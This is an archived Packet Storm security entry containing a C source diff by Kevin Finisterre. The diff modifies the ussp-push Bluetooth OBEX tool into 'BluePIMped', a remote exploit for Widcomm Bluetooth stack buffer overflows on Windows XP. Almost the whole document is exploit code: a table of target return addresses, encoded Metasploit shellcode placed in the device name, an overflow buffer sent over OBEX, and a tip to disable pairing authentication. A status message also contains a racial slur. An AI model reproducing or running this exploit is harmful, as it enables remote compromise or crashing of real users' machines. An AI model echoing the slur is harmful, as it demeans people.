BluePIMped.diff

2005-12-07T00:00:00
ID PACKETSTORM:42124
Type packetstorm
Reporter Kevin Finisterre
Modified 2005-12-07T00:00:00

Description

                                        
                                            `--- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400  
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500  
@@ -1,4 +1,10 @@  
/*  
+ http://www.digitalmunition.com  
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.   
+ http://www.pentest.co.uk/documents/ptl-2004-03.html  
+  
+*/  
+/*  
* UNrooted.net example code  
*  
* Most of these functions are just rips from the Affix Bluetooth project OBEX  
@@ -62,7 +68,10 @@  
  
#include "obex_socket.h"  
  
-#define UPUSH_APPNAME "ussp-push v0.4"  
+#include <bluetooth/hci.h>  
+#include <bluetooth/hci_lib.h>  
+  
+#define UPUSH_APPNAME "BluePIMped v0.1"  
#define BT_SERVICE "OBEX"  
#define OBEX_PUSH 5  
  
@@ -316,6 +325,9 @@  
switch (event) {  
case OBEX_EV_PROGRESS:  
printf("Made some progress...\n");  
+ sleep(3);  
+ printf("Peace nigga...\n");  
+ exit(0);  
break;  
  
case OBEX_EV_ABORT:  
@@ -382,9 +394,7 @@  
name = remote;  
  
name_len = (strlen(name)+1)<<1;  
- if( (namebuf = g_malloc(name_len)) ) {  
- OBEX_CharToUnicode(namebuf, name, name_len);  
- }  
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.   
  
buf = easy_readfile(path, &file_size);  
if(buf == NULL) {  
@@ -424,6 +434,24 @@  
return err;  
}  
  
+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...   
+{  
+ int s = hci_open_dev(hdev);  
+  
+ if (s < 0) {  
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",  
+ hdev, strerror(errno), errno);  
+ exit(1);  
+ }  
+ if (opt) {  
+ if (hci_write_local_name(s, opt, 2000) < 0) {  
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",  
+ hdev, strerror(errno), errno);  
+ exit(1);  
+ }  
+ }  
+  
+}  
  
/*  
* That's all there is to it. With it all setup like this all I have to do  
@@ -434,19 +462,87 @@  
  
int main( int argc, char **argv )  
{  
- if ( argc != 4 ) {  
- printf("%s\n\n"  
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"  
- "\tDEVICE = RFCOMM TTY device file\n"  
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"  
- "\tLFILE = Local file path\n"  
- "\tRFILE = Remote file name\n\n",  
- UPUSH_APPNAME, argv[0]);  
+/*   
+ The following may be necessary in hcid.conf to prevent the pairing prompts.  
+  
+ # Authentication and Encryption (Security Mode 3)  
+ auth disable;  
+ encrypt disable;  
+*/  
+  
+ struct  
+ {  
+ char *os;  
+ u_long ret;  
+ }  
+ targets[] =  
+ {  
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },  
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },  
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },  
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },  
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },  
+ { "[ Crash ]", 0x41424344 },  
+ }, v;  
+  
+ if ( argc != 3 ) {  
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);  
+ printf("Types:\n");  
+ int i;  
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)  
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);  
+  
return( -1 );  
}  
  
- printf( "pushing file %s\n", argv[2] );  
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {  
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */  
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */  
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */   
+ /* this still crashes the BTStackServer.exe... but oh well */  
+ unsigned char scode[] =   
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"  
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"  
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"  
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"  
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"  
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"  
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"  
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"  
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"  
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"  
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"  
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"  
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"  
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";  
+   
+ set_device_name(0,0,scode);  
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);  
+ //printf( "pushing file.\n");  
+  
+ char buf[3000];  
+ memset(buf,'\0',sizeof(buf));  
+ memset(buf,'Z',3); // Sometimes u need 3 z's   
+  
+ int type = atoi(argv[2]);  
+ if(type)  
+ {  
+ printf("[-] Selected target:\n");  
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);   
+ }  
+  
+ int x;  
+ for(x=0; x<=122; x=x+1)  
+ {  
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);  
+ }  
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode  
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {  
+ printf( "error\n" );  
+ return( -1 );  
+ }  
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");   
+ sleep(3);  
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {  
printf( "error\n" );  
return( -1 );  
}  
`